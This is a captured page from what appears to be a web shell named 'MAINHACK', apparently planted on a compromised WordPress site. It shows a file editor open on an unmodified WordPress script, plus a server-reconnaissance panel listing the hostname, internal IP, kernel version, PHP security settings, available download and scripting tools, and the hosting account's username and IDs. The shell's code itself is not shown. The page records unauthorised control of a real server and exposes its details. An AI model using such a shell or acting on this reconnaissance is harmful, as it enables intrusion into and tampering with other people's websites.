[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: wp-a11y.js
window.wp = window.wp || {}; ( function ( wp, $ ) { 'use strict'; var $container; /** * Update the ARIA live notification area text node. * * @since 4.2.0 * * @param {String} message */ function speak( message ) { if ( $container ) { $container.text( message ); } } /** * Initialize wp.a11y and define ARIA live notification area. * * @since 4.2.0 */ $( document ).ready( function() { $container = $( '#wp-a11y-speak' ); if ( ! $container.length ) { $container = $( '<div>', { id: 'wp-a11y-speak', role: 'status', 'aria-live': 'polite', 'aria-relevant': 'all', 'aria-atomic': 'true', 'class': 'screen-reader-text' } ); $( document.body ).append( $container ); } } ); wp.a11y = wp.a11y || {}; wp.a11y.speak = speak; } )( window.wp, window.jQuery );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129